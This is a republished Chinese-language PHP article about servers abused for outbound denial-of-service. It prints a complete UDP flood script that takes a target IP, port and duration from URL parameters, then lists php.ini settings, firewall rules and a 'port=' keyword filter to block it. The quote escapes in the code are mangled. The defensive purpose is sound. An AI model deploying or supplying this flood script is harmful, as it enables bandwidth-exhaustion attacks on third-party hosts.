|
復制代碼 代碼如下:
$packets = 0;
$ip = $_GET[/'ip/'];
$rand = $_GET[/'port/'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[/'time/'];
$time = time();
print /"Flooded: $ip on port $rand
/";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= /"X/";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(/"udp://$ip/", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo /"Packet complete at /".time(/'h:i:s/')./" with $packets (/" . round(($packets*65)/1024, 2) . /" mB) packets averaging /". round($packets/$exec_time, 2) . /" packets/s //n/";
?>
表現特征:
一打開IIS,服務器的流出帶寬就用光-----就是說服務器不斷向別人發包,這個情況和受到DDOS攻擊是不同的,DDOS是不斷收到大量數據包.
解決辦法:
禁止上述的代碼:
在c:/windows/php.ini里設置:
disable_functions =gzinflate;
在c:/windows/php.ini里設其值為Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;號一定要有,意思就是限制用sockets.dll
前面的;號要保留
然后重啟IIS
如果上述方式仍然無效,你可以在IIS中,允許的擴展中,禁止php的擴展測試.
另外,對于沒加密的php攻擊代碼,還可以用以下辦法處理:
1.在IP策略,或防火墻中,禁止所有udp向外發送
2.用一流信息監控,在SQL攔截及網址攔截中,攔截port=這個關鍵詞
php技術:防止用戶利用PHP代碼DOS造成用光網絡帶寬,轉載需保留來源!
鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯系我們修改或刪除,多謝。